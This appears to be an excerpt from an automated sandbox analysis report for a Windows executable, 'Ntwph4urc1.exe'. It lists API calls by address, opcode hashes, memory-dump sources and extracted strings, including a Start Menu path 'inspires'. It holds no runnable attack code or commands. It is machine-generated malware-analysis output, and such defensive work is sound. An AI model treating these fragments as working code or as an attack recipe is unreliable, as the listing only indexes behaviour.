                                              • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                              • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                              • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                              • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                              APIs
                                              • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                              • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                              • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                              • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                              • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                              • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                              • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                              • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                              • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                              • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                              • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                              • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                              • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                              • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                • Part of subcall function 0040669D: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                              • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                              • API String ID: 2624150263-2976168531
                                              • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                              • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                              • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                              • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                              APIs
                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                              • API String ID: 542301482-1275373446
                                              • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                              • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                              • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                              • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                              • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                              • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                              • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                              • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                              • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                              • DeleteObject.GDI32(00000110), ref: 00404EB2
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                              • ShowWindow.USER32(?,00000005), ref: 00405014
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                              • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                              • GlobalFree.KERNEL32(?), ref: 004051F8
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
                                              • ShowWindow.USER32(?,00000000), ref: 004053A1
                                              • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                              • ShowWindow.USER32(00000000), ref: 004053B3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 2564846305-813528018
                                              • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                              • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                              • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                              • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                              • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                              • GetSysColor.USER32(?), ref: 004045E3
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                              • lstrlenW.KERNEL32(?), ref: 00404604
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                              • SendMessageW.USER32(00000000), ref: 00404686
                                              • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                              • SetCursor.USER32(00000000), ref: 00404705
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                              • SetCursor.USER32(00000000), ref: 00404721
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: Call$N$zD@
                                              • API String ID: 3103080414-4182535457
                                              • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                              • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                              • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                              • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                              • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                              • wsprintfA.USER32 ref: 004060B9
                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                              • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                              • API String ID: 2171350718-2304911260
                                              • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                              • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                              • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                              • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                              • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                              • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                              • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                              • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                              • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                              Strings
                                              • *?|<>/":, xrefs: 004066EF
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                              • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 0040669D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-379023009
                                              • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
